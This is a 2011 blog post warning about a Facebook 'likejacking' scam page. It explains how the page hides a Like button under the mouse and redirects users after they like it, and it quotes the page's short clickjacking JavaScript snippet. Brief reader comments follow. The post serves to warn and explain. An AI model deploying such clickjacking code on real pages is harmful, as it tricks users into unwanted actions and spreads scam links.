Sunday, June 12, 2011

Another new Facebook vulnerability stirs up likes

 ______ likes a link.
The World Funniest Condom Commercialfunny-comerccail-condom.blogspot.com
HaHa it's really so funny ~ Don't Miss it!


In case I need to say it, you really don't wanna visit that blog above. The page is the same ol' same ol' click here to load a codec and get your system rooted.

Here is the fun part, but it's still just a typical clickjacking procedure. The page loads an iframe with the like button under the image, and the minute your click on the image or move your mouse within the page, they use that via javascript to trigger the like "click"

Code as follows:

<div id="fb-root"></div>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script> 
<script type="text/javascript" charset="utf-8">
FB.Event.subscribe('edge.create', function(response) {
window.location = "http://world-funniest-condom-video.blogspot.com/";
});
</script>
$(document).ready(function(){
$(document).mousemove(function(e){
x=e.pageX ; y=e.pageY;
$("#like").css({top: (y - 4) + "px", left: (x - 4) + "px"});
});
});
</script>

5 comments:

Unknown said...

Is this one of those links that makes a huge mess of your Facebook wall?

Dejch said...

meh no like facebook

Mikael B said...

That's crazy

Unknown said...

I hate these things!

Supernova said...

My youth pastor 'liked' one of these before lmao

Post a Comment